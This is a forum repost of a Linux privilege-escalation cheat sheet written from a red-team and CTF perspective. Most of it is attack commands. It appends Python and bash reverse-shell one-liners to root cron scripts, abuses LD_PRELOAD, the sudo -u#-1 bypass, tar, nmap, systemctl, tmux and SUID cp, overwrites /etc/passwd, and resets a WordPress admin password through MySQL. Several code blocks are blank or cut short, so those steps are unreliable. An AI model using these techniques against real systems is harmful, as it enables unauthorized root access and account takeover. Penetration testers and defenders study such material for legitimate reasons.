National Cyber Warfare Foundation (NCWF) Forums

Linux privilege escalation made easy

0 user ratings
2020-08-17 09:06:28
Red Team (CNA)

Linux Privilege Escalation: Quick and Dirty

A quick and dirty Linux
Privilege Escalation cheat sheet. I have utilized all of these privilege
escalation techniques at least once.Published on Aug 10, 2020

Linux Privilege Escalation: Quick and Dirty
Automated Tooling
Usually, my approach is to use an automated tool in conjunction with
some manual enumeration. However, you can completely accomplish the
Privilege Escalation process from an automated tool paired with the
right exploitation methodology.

1. (my go-to, fully automated)

2. (my backup)

3. (To look for those sneaky little Kernel Exploits)


Keep in mind, that these are just some of the techniques I have used.
You’ll find that some of the existing Linux Privilege escalation guides
are much more comprehensive:

1. The Holy Grail

2. My Second Favorite Guide

3. GTFOBins (The most comprehensive binary privesc guide)


God Mode


I know, seems crazy, the history command? Why? Well, I’ve successfully performed privilege escalation from finding hints or credentials in the user’s history.


If there’s a capability that has a setuid+ep, the command might be able to be abused


/usr/bin/python2.6 = capsetuid+ep

For instance, I used this cheat sheet for capability exploits


Changing WordPress Password via MySQL DB
I came across a situation in which taking over the WordPress website was
essentially in the privilege escalation process due to versioning.

  1. Find MySQL credentials
  2. Connect to the Localhost Database

mysql -h localhost -u user -p

  1. Authenticate using the credentials you found
  2. Select the database that has the credentials table

USE databasename;

  1. Change the admin password or user’s password that you have access to

UPDATE wp_users SET user_pass=PASSWORD('[email protected]!') WHERE user_login='wpadmin';

  1. KEY: wp_users is the table, SET is for the user password field in
    the table, and where is for the user login field within the table.

Permissive Root Script
If a cron job is running a script as root, determine what the script is
doing. If you have full permission to edit the script, you’re golden.
Note: the >> in the one-liner echo represents overwriting the

Two of my favorite examples:

Python One-Liner

echo 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);["/bin/sh","-i"]);' >>

Bash One-Liner (If the script is a .sh)

echo "rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 7242 > /tmp/f" >>

Now set up a listener on the defined port, and wait for the script to run.

In some circumstances, you may be able to abuse certain services that run via LD_Preload.

  1. Run:

sudo -l

  1. If env_keep+=LD+PRELOAD is seen:
  2. Make a C script named “shell” or whatever you want

nano shell.c

  1. Place the following code in the script:




    void _init() {





  2. Compile the shell

gcc -fPIC -shared -o shell.c -nostartfiles

  1. Take a look at what system services are being preloaded, for
    instance, if you see apache2 then you would do a sudo preload for
    apache2, escalating your current shell to a root level shell

sudo LD_PRELOAD=/home/user/ apache2

Bash SUID This one absolutely blew my mind, I used
it recently. If you find a private SSH Key, and you can log in with it:
Check for a Bash SUID. If you have it, you might be able to escalate
during authentication!

ssh -i id_rsa [email protected] bash -p

Lua Privilege Escalation This is another one of
those strange one-off scenarios. I had a script that allowed me to drop
into a little command prompt and run different commands as root (but
most of them would just print the word “nil”). I had no idea what was
happening. After a little research, I found out that nil was Lua’s
version of null (basically the error was telling me that it was
attempting to use Lua commands but the commands used did not exist) and
the prompt I was using was some sort of Lua Script. Jokingly, I typed
the following:


I was root!!

Sudo Bypass

I noticed the following entry [(ALL, !root) /bin/bash)] upon running:

sudo -l 

I had root permissions to run bash, an obvious win! Attempting to run
it as the root user would not work. A quick google search helped me
understand that it was a Sudo Privilege Escalation bypass:

sudo -u#-1 /bin/bash


If you find a Tar SUID assigned to your current user, it’s an easy win:

sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh

TMUX Session Running as Root

I cannot express how many times this one has been overlooked. I’ve
legitimately exploited 5+ systems in CTF-Like environments with this
gem. If you see a TMUX session running as root, look at the path.
Typically, I’ve seen the session running under /.devs/dev_sess

This can be identified using:

ps -aux | grep tmux

If you see that, and a session is active as the root user, attempt an easy win:

tmux -S /.devs/dev_sess

If it works, check your privs! You might just be root.


Yes, another exceedingly simple win:

nmap --interactive

Systemctl SUID

Identifying this beauty represents yet another win

Run each one of these commands in order:


echo '[Service]


ExecStart=/bin/sh -c "id > /tmp/output"

[Install]' > $TF

systemctl link $TF

systemctl enable --now $TF


Noticing the ‘cp’ command with SUID assigned to your user account
could allow you to overwrite the passwd file of the victim system,
giving yourself root permissions:

  1. Open up a terminal in your attacking machine, create a salted password:

openssl passwd -1 -salt roflroot pass123

  1. Copy your attacking machine local passwd file to have something to edit:

cp /etc/passwd /root/Exploits

  1. Host HTTP Server:

python -m SimpleHTTPServer 8000

  1. Navigate to /tmp directory on the victim host machine or somewhere you have write permissions and download the passwd file:


  1. Copy passwd file to /etc/passwd:

cp passwd /etc/passwd

  1. Switch to your created user:

su roflroot

I hope some of these techniques help you!
If you liked my guide, be sure to follow me on Twitter: @johnjhacking

new comment
Nobody has commented yet. Will you be the first?
Red Team (CNA)

© Copyright 2012 through 2021 - National Cyber Warfare Foundation - All rights reserved worldwide.